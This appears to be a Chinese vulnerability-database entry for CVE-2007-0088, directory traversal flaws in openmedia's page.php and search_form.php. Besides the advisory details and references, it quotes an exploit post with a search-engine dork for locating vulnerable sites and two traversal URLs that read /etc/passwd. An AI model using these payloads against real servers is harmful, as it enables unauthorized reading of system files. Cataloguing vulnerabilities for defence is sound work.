openmedia 'page.php'多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192236 漏洞类型 路径遍历
发布时间 2007-01-05 更新时间 2007-01-05
CVE编号 CVE-2007-0088 CNNVD-ID CNNVD-200701-028
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/86806
https://cxsecurity.com/issue/WLB-2007010019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-028
|漏洞详情
openmedia中存在多个目录遍历漏洞。远程攻击者可以借助提交到page.php的(1)src参数或到search_form.php的(2)格式化参数中的..,来读取任意文件。
|漏洞EXP
openmadia exploit local read file
==========================================
search google >>>> powered by openmedia
======================================
Exploit : 
http://www.site.com/page.php?src=../../../../../etc/passwd

http://www.site.com/search_form.php?lang=fr&format=../../../../../etc/pa
sswd
================================================
Discoverd By :Crack_man
contact : exe_crack_man
=============
team : maroc anti connexion

www.b0rizq.biz/vb
www.tryag.com/vb
=====================
Greetz to : 
b0rizq , red_Casper , broken_proxy

and all friend
|受影响的产品
Openmedia Openmedia 0
|参考资料

来源:XF
名称:openmedia-page-directory-traversal(31258)
链接:http://xforce.iss.net/xforce/xfdb/31258
来源:BUGTRAQ
名称:20070102openmedialocalreadfile
链接:http://www.securityfocus.com/archive/1/archive/1/455786/100/0/threaded
来源:OSVDB
名称:33371
链接:http://osvdb.org/33371
来源:OSVDB
名称:33370
链接:http://osvdb.org/33370
来源:SREASON
名称:2103
链接:http://securityreason.com/securityalert/2103